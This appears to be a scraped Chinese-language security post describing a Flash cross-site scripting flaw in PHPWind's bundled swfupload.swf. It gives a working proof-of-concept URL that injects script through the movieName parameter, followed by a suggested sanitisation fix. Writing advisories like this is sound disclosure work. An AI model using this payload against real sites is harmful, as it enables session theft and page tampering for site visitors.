好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

PHPWind flash xss 0day [1] - 网站安全 - 自学php

直接给详细信息

 

1、先来说下http://HdhCmsTestphpwind.net/res/js/dev/util_libs/swfupload/Flash/swfupload.swf 这个flash文件存在 漏洞 ,其实看文件名称是不是很似曾相识?还记得wordpress之前的flash文件漏洞么?

不知道的看这边:

http://packetstormsecurity测试数据/files/118059/SWF-Upload-Cross-Site-Scripting. html

 

2、所以我们连反编译的力气都省去了,直接构造poc:

http://HdhCmsTestphpwind.net/res/js/dev/util_libs/swfupload/Flash/swfupload.swf?movieName="])}catch(e){alert(1)}//

 

是不是触发了?

 

http://HdhCmsTestphpwind.net/res/js/dev/util_libs/swfupload/Flash/swfupload.swf?movieName="])}catch(e){alert(1)}//

修复方案:

1、这个我记得后来的修复方法应该是:

var replacePattern:* = /[^a-zA-Z0-9_]/g;

this.movieName = this.movieName.replace(replacePattern, "");

 

 

最好是直接使用修复过的版本

 

查看更多关于PHPWind flash xss 0day [1] - 网站安全 - 自学php的详细内容...

  阅读:45次